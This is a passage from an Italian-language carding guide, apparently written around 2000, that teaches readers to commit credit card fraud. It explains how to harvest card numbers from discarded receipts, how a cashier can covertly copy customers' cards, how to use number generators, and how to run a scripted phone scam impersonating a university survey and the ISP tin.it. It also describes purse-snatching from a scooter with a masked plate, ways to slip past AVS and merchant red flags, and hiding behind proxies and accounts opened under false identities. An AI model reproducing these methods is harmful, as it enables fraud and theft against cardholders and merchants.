Secondo questo algoritmo il primo numero deve essere maggiore di 1 rispetto al secondo. Quindi 5 4 rispetta questo 
algoritmo, 4 4 non rispetta l'algoritmo. 

Stessa cosa, ma in modo molto più complicato e lungo (devono applicarlo a 12 cifre) per le carte di credito. 

Capito adesso ? 

Quindi non andate nei siti porno e provare numeri a caso dove dovreste inserire il numero della cc, perché per beccare un 
numero che rispetti l'algoritmo dovreste avere un culo enorme !!! Ovvio, se ce la fate bravi e fortunati voi, ma è stato solo 
un caso, se provate di nuovo non è detto che ce la facciate. 

Comunque ricordatevi una cosa: gli algoritmi DOVREBBERO essere segreti, ma non lo sono e potete trovare 
comodamente programmi che conosco già l'algoritmo della VISA, dell'AMERICAN EXPRESS, della MASTERCARD e 
via dicendo, e che semplicemente cliccando su Generate vi danno numeri di cc TEORICAMENTE validi... Comunque di 
questo ne parleremo più avanti. 


Ok, mi pare che la teoria fino a qui possa bastare.. Adesso passiamo al carding vero e proprio.. Ricordate però che 
l'argomento sarebbe molto più ampio da trattare e quindi non crediate di sapere tutto solo leggendo queste poche righe. 
Anzi !! Questa guida vuole essere proprio un invito ad avventurarsi nel mondo di carding, che secondo me è scarsamente 
trattato qui in Italia, ma neanche in America è molto trattato, nonostante siano molto più avanti di noi. 


Quali sono gli strumenti di ogni buon "cardatore" (di colui che fa carding) ? 


Bhè, per fare carding serve molto poco, praticamente niente. Basta una guida al carding (questa qui va più che bene:-) e un 
bel po' di intelligenza e di furbizia. Ecco il motivo per cui io non sono per niente un buon cardatore :-P 

Ricordate che per essere dei buoni cardatori servono anche buone conoscenze tecniche e buona conoscenza dei vari tipi di 
cc., quindi studiate, studiate e studiate [ anche se secondo me materiale riguardante il carding ce né poco !! ]. 


Ok, ho letto tutta la parte teorica.. Cominciamo la pratica ? 


Calmi ragazzi, calmi.. Adesso cominciamo la parte pratica.. In che cosa consiste la prima parte della pratica ? Ma nel 
procurarsi il codice di una carta di credito !!! Non il codice di una carta di debito, perchè non ce ne facciamo nulla, sia 
perché serve il PIN, sia perché non possiamo utilizzarla via Internet.. Quindi da adesso in poi ci occuperemo SOLO di carte 
di credito. Le carte di debito le lasciamo di nuovo stare.. Forse nella prossima guida.. 


Sapete cosa sono le tre Y ? 


Questa è una sezione aggiunta nella release 2.1 ma che è stata una mia enorme pecca non scrivere... 

Qui infatti parleremo del sistema AVS. Che cazzo è 'sto sistema AVS ? Bhè, diciamo che è la migliore arma dei 
commercianti per difendersi dalle truffe via Internet da parte di noi cardatori.. Per fortuna è ancora (relativamente) poco 
diffuso, ma sono sicuro che si diffonderà presto con grande rischio da parte nostra.. 

Allora, vogliamo parlare o no di AVS ? 

AVS sta per Address Verification Service. Ne sapete tanto che prima, vero ? Più che un sistema, l'AVS è una procedura di 
controllo.. 

Infatti tramite l'AVS si controlla se l'indirizzo fornito dall'acquirente è effettivamente corrispondente a quello del possessore 
della carta di credito: la procedura deve fornire una risposta con Y (yes, yes, yes): il primo per l'indirizzo postale, il secondo 
per il codice di avviamento postale, il terzo per il corretto abbinamento di entrambi.. 

Ho sentito qualcuno gridare:" Merda !!!!!!!!!". E non gli dò torto. 


Cos'altro guardano i venditori ? 


Dato che chi vende in Internet non è stupido e ci sono delle cose che possono insospettire chi vende e spingerlo a fare 
ulteriori accertamenti.. Quali sono questi famosi campanelli d'allarme ? Bhè, eccovene una piccola lista: 


e Ungrosso acquisto di merce, soprattutto se di generi molto di moda fra i giovani. Parliamo quindi di materiale sportivo, 
giochi PC, ecc... 

Nomi a cui sono stati intestati la email e la carte di credito differenti. 

Indirizzi email sbagliati (inesistenti, cancellati, ecc....) 

Ripetuti tentativi di presentare un ordine (non provate più di una cc se la prima non va). 

Codice di risposta AVS diverso da YYY. 


Allora.. Riguardo al primo c'è poco da dire.. Evitate i grossi acquisti (superiori insomma alle 200.000 £). Poi.. Createvi una 
email con nome simile a quello della cc (se ad esempio la carta di credito è intestata a Gianni Verdi voi fatevi un'email 
gianver@yahoo.it, capito il concetto ?). Date quindi indirizzi email esatti, ma non controllate spesso quella casella email, 
potrebbero esserci trappole. Per il resto non mi pare ci sia niente da aggiungere.. 


Ma come faccio a procurarmi il codice di una carta di credito ? 


Esistono molti metodi.. Adesso ne passeremo in rassegna qualcuno.. 
Il metodo secondo me migliore è quello del trashing, logicamente è il mio preferito.. Ma parleremo anche di altri metodi, 
evidenziandone i vantaggi e gli svantaggi.. 


METODO 1: Trashing 

Oddio, che è 'sto trashing ? Molti di voi già sanno cos'è il trashing, altri non hanno nemmeno la più pallida idea di cosa sia 
ma l'hanno fatta decine di volte, i restanti non sanno cos'è né l'hanno mai fatto.. 

Trashing deriva da "trash", spazzatura in inglese. E che ne facciamo noi della spazzatura ? 

Forse non sapete che frugando nella spazzatura di una persona si possono scoprire molte persone su di essa, sulle sue 
abitudini.. E' un compito un po' ingrato, ma dà dei risultati non da poco. 

Pensate a cosa potete trovare nella spazzatura di una persona.. Bottiglie, cartoni di latte, sacchetti di biscotti, cartacce, 
appunti, scontrini.. 

Appunti e scontrini.. Molta gente li butta via senza avere la premura di distruggerli.. Gli scontrini, per chi sa leggerli sono 
molto interessanti.. Vediamo come fare.. 

Facciamo un passo indietro.. Vi ricordate cosa succede quando si paga con una carta di credito ? Si deve firmare uno 
scontrino, di cui una copia va' al negoziante e l'altra resta al titolare ( vero o presunto ) della cc. 

Ora, cosa succede a quegli scontrini ? Bhè, la copia che resta al negoziante è off-limits. Infatti il povero commerciante deve 
tenerla per ALMENO 3 mesi per eventuali controlli, proteste, ecc.. 

L'altra copia, quella che prende il titolare della cc, invece ha sorte molto diversa. Infatti l'utente non è tenuto a tenerla per un 
determinato periodo, per controlli o l'altro. Può farlo, ma il 99 % delle persone butta via lo scontrino o appena fuori dal 
negozio oppure appena a casa. 

E a noi che ne frega dello scontrino ? A noi non interessa il codice della cc ? Sì, a noi interessa il codice.. Come ce lo 
procuriamo è indifferente.. Potremmo leggerlo direttamente dalla carta oppure leggerlo sullo scontrino.. COSA ??? Il 
codice è scritto sullo scontrino ? Certo !!!! Basta saperlo trovare.. Vi faccio uno schema con uno scontrino che ho preso un 
paio di giorni.. Ovviamente i dati sono modificati ( in particolare il numero della carta ) ma a voi quello che importa c'è !! 


SI <====== TIPO DI CARTA DI CREDITO 

Esso 3434 D 1 <======NOME DEL NEGOZIO DOVE E' AVVENUTO IL PAGAMENTO 
via Nazioni Unite <======INDIRIZZO DEL NEGOZIO 

20100 MILANO <======INDIRIZZO DEL NEGOZIO 

Eserc. Stab. Cassa Pen <======TIPO DI NEGOZIO 

3012435 00002 001 000 <======NUMERO DEL TERMINALE 

17/06/00 09.49 00002 <======DATA E ORA DELL'OPERAZIONE 

4935940025486161 09/01 <======NUMERO DELLA CC CON DATA DI SCADENZA 

NOP CONTR 799 AUT 097777 <======NUMERO AUTORIZZAZIONE 

IMPORTO LIRE 45.300 <======IMPORTO DELL'OPERAZIONE IN LIRE 


PARI A EURO 23,40 <======IMPORTO DELL'OPERAZIONE IN EURO 


sile <======FIRMA DEL TITOLARE DELLA CARTA 
Firma/Signature 


Grazie e Arrivederci <======FORMULA DI COMMIATO 


Questo è un normalissimo scontrino che esce dalle "macchinette" [ terminali POS sarebbe comunque il termine più corretto 
], non è speciale, non l'ho inventato io, ho modificato un paio di dati per salvaguardare il mio lavoro, ma lo scontrino è 
esattamente come l'ho riportato !!! 

Ho messo una legenda a lato per aiutarvi a capire il significato delle varie righe, naturalmente non sono sicuro che siano 
tutte giuste, se vedete sbagli e volete aiutarmi contattatemi pure ( screener_it@freemail.it ). 

Tornando ai fatti "nostri"... Sono sicuro che le prime due scritte in neretto sta solleticando la vostra attenzione.. Tipo di 
Carta di Credito e numero della CC (con data di scadenza). 

Nel primo caso al posto di S.I. potrete trovare EDC/MAESTRO, AMERICAN EXPRESS, VISA, ma il discorso non 
cambia. 

Il numero della cc con data di scadenza invece potrebbe trarvi in inganno... Le carte di credito infatti non hanno 16 cifre ? E 
allora lì perchè sono 20 con a un certo punto una sbarra ? Semplice (credo che l'abbiano capito tutti). 

Le ultime quattro cifre " 09/01 " è la data di scadenza della carta, settembre 2001. 

Il resto, vale a dire 4935940025486161 è il numero vero e proprio della carta.. Ma scusa, il codice della carta non è in 
formato YYYY XXXX WWWW VVVV ? Qui è tutto un numero.. Ragazzi, un po' di fantasia !!! Aggiungete un paio di 
spazi ed avete il numero della vostra prima carta SI rubata.. O sarebbe più corretto dire cardata ? Comunque sia: 


CARTA SI 4935 9400 2548 6161 scadenza settembre 2001. 


Cosa volete di più dalla vita ? 

Se magari riuscite a leggere la firma del titolare ( che DEVE esserci ) avete anche il nome e cognome del titolare della cc. 
Praticamente come averla in mano. 

Adesso qualcuno di voi si pone una domanda che stavolta è VERAMENTE stupida.. Come procurarsi gli scontrini delle 
carte di credito ? Non credo che basta chiederli.. 

Avete ragione, chiederli non conviene ( io non ho mai provato, voi non provate e poi ditemi :-). E allora come fare ? 

Di cosa stiamo parlando? Di trashing.. E allora ? Potete trovare gli scontrini nei bidoni vicini ai negozi, per terra nei centri 
commerciali, potete trovarli per strada [entro un 100/200 metri dai centri commerciali e dai negozi c'è una vera miniera di 
scontrini !!].. Usate la fantasia. Forse il trashing non è un lavoro pulito, ma è comodo.. 

Se volete proprio fare i puliti mettetevi davanti a un negozio dove passano tante persone e aspettate che qualcuno butti per 
terra uno scontrino e raccoglietelo al volo.. Logicamente senza attirare troppo l'attenzione !! 

Se per caso vi beccano a frugare nella spazzatura inventate delle scuse.. Se vi becca una vecchia potete semplicemente 
andarvene, senza bisogno di dirle niente, se invece si tratta di un poliziotto o di un adulto inventate (meglio, preparatevi 
qualche scusa prima). Se vi beccano a frugare nei bidoni dite che avete perso il portafoglio (scusa vecchia, ma funziona 
sempre), se vi beccano mentre raccogliete da terra uno scontrino potete dire che state cercando un foglietto su cui avete 
scritto un importante numero di telefono oppure che lo raccoglievate per buttarlo via. Non preoccupatevi troppo se vi becca 
un poliziotto.. In fondo per cosa potrebbe arrestarvi ? Per tentata raccolta di uno scontrino ? Ma fatemi il piacere !! Chi vi 
porterebbe in questura per accertamenti per "raccoglimento abusivo di cartacce" 2??? 


METODO 2: Il giovane commesso :-) 

Premetto che questo metodo l'ho trovato io, non l'ho copiato da nessuno.. Se magari qualcuno l'ha trovato prima di me non 
lo so, comunque è tutta farina del mio sacco, tutta esperienza.. 

Dunque.. Vi ricordate della storia di prima, quella dello scontrino ? Una copia và al titolare della cc, l'altra va' al 
negoziante.. Che fine faccia la copia che riceve il titolare della cc l'abbiamo già visto sopra, il negoziante, come ho già 
detto, deve tenerla per almeno 3 mesi.. 

Ma pensate di essere voi il negoziante.. Avreste libero accesso a tutti gli scontrini, che contengono le stesse informazioni di 
quello consegnato al cliente [ vedi scherma precedente ]. 

Potremmo prendere il codice della carta, la data di scadenza e tutto il resto con ancora maggiore facilità !! 

Impossibile dite ? Ecco come fare. E' tutto sperimentato e fattibile, non ci sono balle o operazioni impossibili. 

Siete alla cassa, vi fate consegnare la cc dal cliente e la passate normalmente nel lettore per il pagamento, digitate l'importo 
e attendente l'arrivo dello scontrino. Fin qui tutto normale. 

Ora viene il bello. Non il difficile, perché invece è facilissimo. 

Normalmente dopo aver fatto passare la carta il commesso può fare due cose: 


1.- Riconsegnare la cc al cliente 
2.- Mettere la cc sul tavolino con il dorso ( dove c'è la firma ) rivolto verso l'alto, per controllare la corrispondenza della 
firma. 


Noi invece faremo una cosa diversa. Dopo aver fatto passare la carta la metteremo sul tavolino con la faccia anteriore 
rivolta verso l'alto. Dato che sulla faccia anteriore sono impressi nome e cognome del cliente voi dovete riuscire a leggere 
nome e cognome e dovete riuscire a imprimerli nella mente. Dovete tentare di ricordali. 

Appena esce lo scontrino fatelo firmare al cliente, consegnateli la sua copia e poi.. 

Senza farvi notare prendete carta e penna e scrivere subito il nome e cognome di quel cliente, poi prendete lo scontrino e 
trascrivetevi il numero della cc e la data di scadenza. 

Invece di trascrivere il numero della cc e la data di scadenza potete "fregarvi" direttamente lo scontrino, tanto se manca uno 
scontrino non se ne accorgono mica.. Se cominciamo a mancarne di più magari potrebbero dire qualcosa, quindi siate 
ragionevoli e non ingordi. Uno scontrino al giorno al massimo !! 


Questo sistema è praticamente il più perfetto e sicuro che attualmente esista, è meglio del furto ( vedremo poi il perché ), 
l'unica difficoltà consiste nella diffidenza del cliente. Alcuni infatti appena mettete la carta sul tavolo la girano ( brutti str.. ), 
mentre altri se la riprendono proprio. 

Altri invece continuano a spiarvi lo sguardo e appena vedono che state guardando la loro carta di credito vi lanciano 
un'occhiata da far paura (sto tremando..!!) oppure si potrebbero mettere a chiedervi perché guardavate la carta.. Per fortuna 
a me la seconda non è mai capitata, ma credo che sarebbe abbastanza imbarazzante la faccenda. Comunque se riuscite a 
conservare il sangue freddo (difficile in queste situazioni) potete dire che non stavate guardando la carta (scusa vecchia e 
prevedibile, forse questa è meglio non usarla) oppure potete dire che stavate guardando se era un bancomat o una carta di 
credito perché il lettore l'ha riconosciuta come carta di credito ma vi pareva fosse un PagoBancomat (o cose del genere.. 
Fingete di essere inesperti, non mettetevi a fare discorsi sul carding :-) 


METODO 3: generatori automatici 

Cosa sono i generatori automatici ? 

Sono dei semplici programmi che semplicemente cliccando un tasto vi forniscono il numero di una carta di credito di 
qualsiasi tipo vogliate (VISA, AMERICAN EXPRESS, ecc..). 

Come fanno ? Semplice. Questi programmi contengono anche gli algoritmi delle varie aziende paranbancarie e tramite 
questi forniscono i codici di possibili loro carte credito. 

Secondo me i migliori sono ARKS FAC e CREDIT PROBE. (vedi FAQ) 

Molte persone dell'underground (o gente che si considera da sola facente parte dell'underground italiano) dicono che i 
generatori automatici di cc sono inutili, lamerosi, e via dicendo.. 

Altri invece dicono che sono sicuri, comodi, utili per gli acquisti on line e via dicendo. 

Io come al solito mi piazzo nel mezzo. Questi generatori automatici in genere danno solo numeri di cc solo AMERICANE. 
In più c'è il problema delle probabilità. Le possibili carta di credito ad esempio della VISA (i numeri di cc che sarebbero 
validi secondo il loro algoritmo insomma) sono milioni, ma quelle attive invece sono molte meno. Quindi potreste trovarvi 
con un numero di carta sì valido, ma non attivo. Acquisti on line con queste non ne fate neanche da morti. 

Quindi sono inutili questi generatori automatici ? No, sono anche utili. 

Infatti molti siti xxx ( siti porno, insomma ) quando digitate il numero della "vostra" (ottenuta con i generatori automatici) 
carta di credito controllano solo la validità dell'algoritmo e non controllano che sia attiva o meno. 

Allora ? Sì, questi programmi possono essere utili. Ma solo in determinate occasioni e solo con determinati utilizzi. 


METODO 4: Il social engeering 

Chi ha letto la versione 1 di questa guida ha già letto questo metodo. Bene. Ma forse è meglio che adesso lo rileggete tutti 
perché l'ho leggermente modificato, rendendolo più utilizzabile. 

Cos'è il social engeering ? Bhè, le definizioni possono essere tante, alla fine dei conti si tratta di spacciarsi per qualcun'altro 
per recuperare informazioni private. 

Il social engeering è strettamente legato al telefono e a Internet, che sono i due mezzi per eccellenza dove per comunicare 
basta la voce (o una tastiera) e non c'è nessun contatto personale. Tramite questi mezzi insomma potete spacciarvi 
tranquillamente per chiunque. 

Per questa volta mettiamo da parte Internet, e vedremo come recuperare i numeri di una carta di credito tramite un telefono. 
Che cosa ci serve ? 

1.- Un telefono pubblico abbastanza appartato 

2.- Una voce calma senza tremoli 


3.- Sangue freddo 
4.- Un piano ben congegnato 


Perché un telefono pubblico e perché appartato ? Perché nel disgraziato caso qualcosa vada male è difficile che risalgano a 
voi se usate un telefono pubblico, se usate il telefono di casa o il cellulare vi trovano in 3 secondi !! 

Deve essere appartato perché non è proprio il massimo mettersi a parlare di cc al telefono in mezzo a una piazza. 

Una voce calma senza tremoli.. Perché la nostra vittima non deve avere dubbi riguardo alla nostra identità e dobbiamo 
essere rassicuranti e convincenti. 

Sangue freddo.. Dovete rimanere tranquilli anche se la faccenda prende pieghe non previste (serie di domande da parte 
della vittima che non avevate previsto, ecc..). 

Un piano ben congegnato.. Dovete cercare di scrivervi prima cosa direte al telefono e prevedere ogni piega della 
discussione e prepararvi piani di "fuga". 

Non sbattete mai il telefono in faccia se qualcuno comincia a fare troppe domande ma cercate di defilarvi e di salutare per 
non fare venire dubbi in nessun caso. 

Stavolta il piano si dividerà in due fasi. Una di approccio e una di azione vera e propria. 

Prendete l'elenco telefonico e prendete la prima persona che vi capita. Evitate dottori, avvocati, ingegneri, ecc.. 

Prendete di mira persone normali. 

Nella prima telefonate dovrete ottenere delle informazioni riguardo alla persona, che non conoscete per niente. Dovete 
scoprire se e in caso che tipo di carta di credito possiede e se possiede un accesso a Internet. 

Ma non dovete dirlo direttamente altrimenti vi sgamano subito. 

Eccovi un esempio di conversazioni di approccio. 

S = Screener_it 

P = Pirla qualsiasi 


P = Pronto ? 

S = Buongiorno. Parlo con il signor xxx ? (al posto di xxx il nome che avrete trovato sull'elenco) 

P = Sì, desidera ? 

S = Chiamo per conto dell'università di ( la più vicina che c'è). Stiamo svolgendo una ricerca su 80 gruppi famigliari della 
zona per avere un quadro del livello di tecnologia in uso dalle famiglie. Le ruberò solo un paio di minuti 

(mi raccomando, voce calma, non abbiate fretta, ecc..). 

P = Va bene, mi dica pure. 

S = Per prima cosa.. Di quante persone è composto il suo gruppo familiare ? Quanti figli ha ? 

P =... (a noi che ce ne frega ?) 

S = Bene. Ha un PC a casa ? Se sì chi li usa ? Lei, i figli o il suo/la sua partner. 

P =... (che rogna) 

S = Ha un accesso a Internet ? Se sì con provider (tin.it, tiscalinet.it, ecc..) 

P = Sì, contin.it 

S = Ha o usa una carta di credito ? 

P = Sì, ho una VISA. (se vi dice il tipo è meglio, altrimenti faremo diversamente). 

S = Ha mai fatto compere via Internet ? Se sì di che tipo ? Materiale informatico, libri, oggettistica varia ? 

P = Sì, ho comprato un paio di libri.. (Come se me ne fregasse) 

S = Ha mai pagato via Internet con la carta di credito ? O preferisce pagare alla consegna ? (se prima ha risposto che non ha 
mai comprato via Internet chiedetegli il perché, se per paura, per non interesse, o altro). 

P = Pago con la carta di credito, ma solo presso siti affidabili. 

S = (se volete fate altre domande) 

P=... 

S = Bene, la ringrazio davvero. Posso permettermi di inviarle un piccolo omaggio per la sua collaborazione ? 
P=.. 

S = La saluto. Grazie ancora e arrivederci. 


Bene, durante la conversazione è meglio avere sottomano un foglio per segnarsi eventuali dati importanti, come ad esempio 
il tipo di carta di credito, ecc.. 
Segnatevi il nome il numero del pirla che avete chiamato perché dovrete chiamarlo un'altra volta. 


Aspettate che passino un paio di settimane (2 o 3 settimane sono sufficienti) perché si dimentichi la vostra voce e poi 
telefonate di nuovo, stavolta passeremo all'azione. 


P = Pronto ? 

S = Buongiorno, sono della tin.it. Parlo con il sign xxx (nome della prima volta) che ha presso di noi un abbonamento a 
Internet ? 

P = Sì, sono io. 

S = Bene. Senta ci sono dei problemi con il suo account. Infatti cdnow.com (oppure un altro sito che vende materiale via 
Internet, amazon.com o altri) ci ha comunicato che qualcuno tramite il suo abbonamento ha più volte pagato con una carta 
di credito per un totale di 500.000 £ (!!!!). Data l'entità della cifra volevamo avere la sua conferma riguardo a questo 
acquisto. 

P = Veramente io non ho mai visitato questo cdnow.com 

S = Forse l'avranno visitato i suoi figli (se li ha, vedete la prima conversazioni). Chieda se magari loro credendo di fare solo 
una ragazzata.. 

P = Va bene, aspetti un attimo. [urla in sottofondo a chi ha usato Internet :-) ].. No, nessuno ha detto di aver visitato quel 
sito. 

S = Allora ho paura che qualcuno ha rubato le password del suo abbonamento e le stia usando per fare acquisti via Internet. 
E magari sta usando la sua carta di credito. Se mi dice il numero della sua carta di credito vediamo subito se corrisponde a 
quello usato su cdnow.com e allora le dico se bloccarla subito o meno. 

P = Va bene, aspetti un attimo.. Ecco la carta.. (azzo, che agitato l'amico) 

S = Mi dica pure il numero. 

P= YYYY XXXX WWWW VVVV 

(noi intanto scriviamo il numero della cc su un foglietto). 

S = Aspetti che controllo.. No, per fortuna non è la sua carta. Se mi dice anche la data di scadenza controllo che non sia 
stata usata su altri siti.. 

P= Scade il ../.. 

S = No, è tutto a posto. Nessuno ha usato la sua cc. Comunque faccia un controllo del PC per controllare che non abbia 
virus. Le consiglio di comprare (se non ce l'ha già) Norton Antivirus. :-) 

P = Sì, ma per le password dell'abbonamento Internet che mi hanno rubato.. 

S = A quello penseremo noi... Grazie e arrivederci. 


Ed eccovi qui, con numero di carta di credito e nome del titolare e data di scadenza. Ammetto che perché qualcuno caschi 
in un trucco del genere dovete avere un culo enorme !!! Cmq provate, rischio minimo se usate una cabina !! 


METODO 5: il furto 

Secondo me questo è il metodo più stupido che possiate usare. 

Non credo che vi serve che io spieghi come si fa. Vi piazzate in due con un motorino (scooter) davanti a un centro 
commerciale. Per mascherare la targa del ciclomotore potete usare semplicemente un fazzolettino oppure potete mettere 
sopra un foglio di carta bianco e scrivere una targa a caso. In questo modo se ci sarà una denuncia la targa che sarà data alla 
polizia sarà sbagliata e non risaliranno certo a voi. 

In due.. Uno guida la moto e l'altra prenda la borsa della prima signora che affiancate. 

L'unico vantaggio di tutto questo è che avrete in mano fisicamente la carta di credito. Ora vi elencherò tutti gli svantaggi. 
La carta di credito verrà disattivata in 24 ore. Se per caso la signora che affiancate cade e batte la testa vi beccate pure una 
denuncia per omicidio colposo. La denuncia per furto è assicurata (fosse anche a ignoti, ma la denuncia c'è). 

E tutto 'sto casino magari la carta di credito non c'è !!!! 

Quindi io mi pongo in tutto e per tutto contro questo metodo. L'ho riportato solo per dovere di cronaca, perché alla fine dei 
conti anche questo è un metodo di carding, certamente il meno nobile e il più vergognoso che possiate usare. 

Non l'ho mai usato e sono orgoglioso di non averlo mai messo in atto. Il resto sono affari vostri !! 


Adesso ho il numero di una carta di credito (oppure una carta di credito). Come lo uso ? 

Questa sì che è una domanda interessante e da sviluppare in modo molto ampio e soprattutto molto dettagliato. Molto 
dettagliato ho detto e lo ripeto, perché vi ricordo che il carding è reato e quindi è meglio proteggersi le spalle. La legge non 
è molto gentile con noi. Quindi attenti ragazzi [e ragazze..]. 

Allora, ci sono molti modi per usare le carte, a seconda del rischio che volete assumervi e a seconda del modo in cui vi siete 
procurati la carta. Infatti ciò che potete fare se avete la carta in mano non lo potete fare se avete solo il codice della card. 
Capito ? 

Passiamo in rassegna i vari metodi: 

LEGENDA: 


Rischio: 

* = Minimo. Praticamente una passeggiata 

** = Medio. Qui è meglio farci un po' di attenzione ed esagerare con le misure di sicurezza. 

*** = Alto. Se volete giocare con il fuoco.. 

**#** = Altissimo. Fatelo solo se siete sicuri di quelle che fate e usate tutte le misure di sicurezza del mondo!! 


PRECAUZIONI: 

Prima di leggere queste info vi conviene leggere queste precauzioni. 

Usate dei proxy. Ma cosa sono i proxy ? Oddio, devo spiegarvelo proprio? Vabbè, tanto è questione di due minuti. 

I proxy sono dei server che redirigono la nostra connessione verso il sito che vogliamo raggiungere tramite loro. Non avete 
capito un cazzo, vero ? Facciamo uno schema che è meglio. 

A= voi 

B = sito porno da raggiungere 

C = server proxy 


Questo è quanto succede se non usate un proxy 

A ==richiesta informazioni ==> B 

B ==invio informazioni ==> A 

In questo modo B sa benissimo chi siete, sa il vostro indirizzo IP, che S.O. usate, che browser, ecc.. 

Invece usando un proxy succede questo: 

A ==richiesta informazioni ==> C ==richiesta informazioni ==> B 

B ==invio informazioni ==> C ==invio informazioni ==> A 

Usando un proxy quindi B non sa che siete voi a richiedere le informazioni, ma crede che sia C. In questo modo B non ha le 
vostre informazioni direttamente. Per altre informazioni sui proxy andate verso la fine della guida, nella sezione FAQ. 


Allora, dopo che abbiamo capito cosa sono e a cosa servono i proxy, prendiamone uno (vedi sez. FAQ) e poi configuriamo 
Internet Explorer (I.e.) o Navigator Netscape per l'azione. 

Infatti prima dobbiamo renderci ancora più anonimi. Ancora di più ? Ma i proxy non sono sufficienti ? No, perché vi 
ricordo che state per commettere un azione illegale. Quindi è meglio prendere tutte le precauzioni possibili. 

Disabilitiamo i cookie (per I.e. Strumenti - Opzioni Internet - Protezione - Internet - Personalizza Livello - scorrere fino a 
Cookie e selezionare Disattiva) (per Navigator di Netscape Modifica - Preferenze - Avanzate - nella finestra dei cookie che 
vi appare lì di fianco selezionare Disabilita i cookie). 

Poi disabilitiamo Javascript (stesso procedimento dei cookie, solo che stavolta togliete il segno di spunta a Abilita 
Javascript). 

Fatto. Siamo anonimi adesso ? MAGARI !!!! 

Per maggiori informazioni su come essere anonimi andate sul Tank Commandos Web Site. 

Cmq per fare quello che dobbiamo fare è sufficiente questo. 

Se poi volete fare proprio i paranoici (e fate bene) potete attivare presso http://clubnet.tin.it, http://www.tiscalinet.it, 
http://www.worldonline.it, http://www.libero.it, ecc.. un abbonamento Internet con dati anagrafici falsi. Cioè ? Nome e 
cognome falsi, data di nascita falsa, codice fiscale falso.. Naturalmente potete usare il mitico GenerID ver. 2.2 di Cavallo de 
Cavillis (vedi FAQ) che vi darà tutti i dati falsi da usare, codice fiscale, indirizzo, e molto altro ancora compresi. 


ABBONAMENTI A SITI PORNO 

Rischio: * 

Tipo di carta necessario: va bene il numero di una qualsiasi carta, in qualsiasi modo ve lo siate procurato.. 

Svolgimento: 

Bhè, questo è senz'altro il trucco più facile e divertente che possiate fare. Per cominciare con il carding è un passaggio 
obbligatorio. Rischio minimo, potete usare qualsiasi carta di credito, a prescindere da come ve la siete procurata. Generatori 
automatici, trashing, il giovane commesso, furto, social engeering. Insomma, basta che sia un numero di cc. 

Nonostante ciò è utile prendere un paio di misure di sicurezza, tanto per salvarci il culo nel disgraziato caso che le cose 
vadano male. 

Accessori utili quindi per questo tipo di azione sono proxy, webproxy, abbonamenti altrui oppure abbonamenti attivati da 
noi con dati anagrafici falsi. (vedi precauzioni) 

Cmq per farsi un abbonamento a un sito porno sarebbe sufficiente usare o un paio di proxy oppure un abbonamento a nome 
non nostro. Usarli entrambi conviene, non è necessario. 


Il resto è facile facile. Andiamo nel primo sito porno che incontriamo (non andate su playboy.com a provare !! Usate siti 
poro semi-sconosciuti) e clicchiamo sulla famigerata scritta "Join". Completiamo la scheda di registrazione che apparirà 
con nome e cognome falsi, data di nascita falsa (qualche sito la richiede, in genere bastano nome, cognome e numero di cc) 
e numero della carta. 


Il gioco adesso è fatto. Il sito vi darà login e password per entrare nell'area "riservata". Ricordate però che l'accesso durerà 
poco, giusto il tempo che il sito si accorga che avete usato una cc non vostra.. E allora l'account verrà disattivato. In genere 
basta una settimana. 


Due piccoli consigli: 

- Per un giochetto del genere non usate cc di persone realmente esistenti, quelle che vi danno i generatori automatici vanno 
più che bene e rischierete molto meno 

- Fate girare subito tra i vostri amici (reali e anche quelli via email) le password che avete ottenuto. In questo modo avrete 
due vantaggi non da poco. Il primo è la fama di grandi hacker che vi farete (ricordate che giochetti del genere comunque 
non sono per niente da hacker, anzi !!!) e la seconda è che il sito porno avrà difficoltà a risalire al vostro account se decine 
di indirizzi IP hanno usato quelle password... Se proprio volete fare un favore a tutta la rete spedite le vostre password al 
sito www.xxxpassword.org ! 


ATTENZIONE: Alcuni siti porno a causa delle continue truffe che subivano hanno deciso di passare al contrattacco 
prendendo misure drastiche.. Molte hanno deciso di sobbarcare il lavoro di controllo (e di accettazione) delle cc ad aziende 
esterne, che nel 99% dei casi sono molto professionali. Per farvi capire con chi state trattando vi sbattono subito in faccia il 


ACQUISTI DI SERVIZI ON LINE 

Rischio: ** 

Tipo di carta necessario: In questo caso è consigliabile usare cc reali, che vi siete procurati con il trashing, con il furto, con 
la storia del commesso.. 

Svolgimento: 

Acquisto di servizi on line.. Di che stai parlando Screener_it ? 

Come ben sapete su Internet non si vendono solo merci ma anche servizi. Cosa intendo per servizi ? Bhé, si vendono 


Ad esempio su direct.it potete comprare un programma e scaricarvelo direttamente. Senza bisogno che vi spediscano a casa 
niente. 
Su galactica.it potete farvi un abbonamento flat (vedi FAQ). Su numerosi siti potete trovare in vendita shell. 


Il procedimento è lo stesso dell'abbonamento a siti porno. Ci sono però delle differenze non da poco. Una differenza non da 
poco me l'ha fatta notare XantriX che ha provato ad acquistare una shell su www.shellux.net 

A un certo punto della sua "azione" XantriX si è trovato davanti a un messaggio del genere: 

"Scan verification, you will have to scan both sides of your credit card (cover the last 4 digits for security) and a legit ID 
like your driversi license or passaport. Send an email to salesi@shellux.net with the scans attached. On receipt of your 
scans your account will be setup right away." 

Traduco, per chi non sapesse l'inglese [che ormai dovrebbero sapere tutti, dai !!]. 

"Verifica tramite scan. Lei deve passare con lo scanner entrambe le facce della sua carta di credito (copra le ultime 4 cifre 
per sicurezza) e un documento d'identità valido, come la sua patente o il suo passaporto. Spedisca una email a 
salesi@shellux.net con gli scan allegati. Al ricevimento dei suoi scan il suo account verrà attivato." 

In questo caso c'è poco da fare.. Infatti dovremmo avere a disposizione uno scanner (che magari non tutti hanno, ma questo 
è proprio l'ultimo dei nostri problemi), dovremmo avere fisicamente in mano la carta di credito e anche un documento del 
proprietario. Praticamente impossibile. Complimenti a www.shellux.net per aver trovato un modo per fregarci. Comunque 
se riusciste a rubare una borsetta c'è sicuramente sia una carta di credito e anche un documento di identità. Chi ha orecchie 
per intendere.. 


Un'altra differenza è che molti siti richiedono che Java e gli Active X siano attivati (come galactica.it). Non c'è problema, 
ricordatevi però di usare un abbonamento non vostro e usate anche un paio di proxy. 


ACQUISTI DI MERCE ON LINE 


Rischio: *** 

Tipo di carta necessario: In questo caso è consigliabile usare cc reali, che vi siete procurati con il trashing, con il furto, con 
la storia del commesso.. 

Svolgimento: 

Qui la faccenda si fa interessante, non trovate ? Naturalmente, più è interessante più è rischioso.. Se vi piace giocare con il 
fuoco.. Ma attenti a non bruciarvi. Cose del genere posso segnarvi per tutta la vita. 


Dunque, di cosa abbiamo bisogno stavolta ? Di una cc reale. E poi ? 

